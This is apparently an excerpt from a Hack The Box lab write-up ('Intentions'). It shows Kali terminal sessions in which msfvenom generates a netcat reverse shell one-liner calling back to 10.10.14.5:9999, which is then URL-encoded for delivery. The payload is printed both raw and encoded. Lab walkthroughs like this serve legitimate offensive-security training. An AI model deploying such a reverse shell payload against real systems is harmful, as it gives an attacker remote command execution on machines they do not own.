msfvenom
┌──(kali㉿kali)-[~/archive/htb/labs/intentions]
└─$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.5 LPORT=9999
[-] no platform was selected, choosing msf::Module::Platform::Unix from the payload
[-] no arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
payload size: 100 bytes
mkfifo /tmp/wimkykz; nc 10.10.14.5 9999 0</tmp/wimkykz | /bin/sh >/tmp/wimkykz 2>&1; rm /tmp/wimkykz
Generating a reverse shell payload with msfvenom
┌──(kali㉿kali)-[~/archive/htb/labs/intentions]
└─$ hurl -U 'mkfifo /tmp/wimkykz; nc 10.10.14.5 9999 0</tmp/wimkykz | /bin/sh >/tmp/wimkykz 2>&1; rm /tmp/wimkykz'
original :: mkfifo /tmp/wimkykz; nc 10.10.14.5 9999 0</tmp/wimkykz | /bin/sh >/tmp/wimkykz 2>&1; rm /tmp/wimkykz
url encoded :: mkfifo%20%2Ftmp%2Fwimkykz%3B%20nc%2010.10.14.5%209999%200%3C%2Ftmp%2Fwimkykz%20%7C%20%2Fbin%2Fsh%20%3E%2Ftmp%2Fwimkykz%202%3E%261%3B%20rm%20%2Ftmp%2Fwimkykz
Encoding it in the URL format for delivery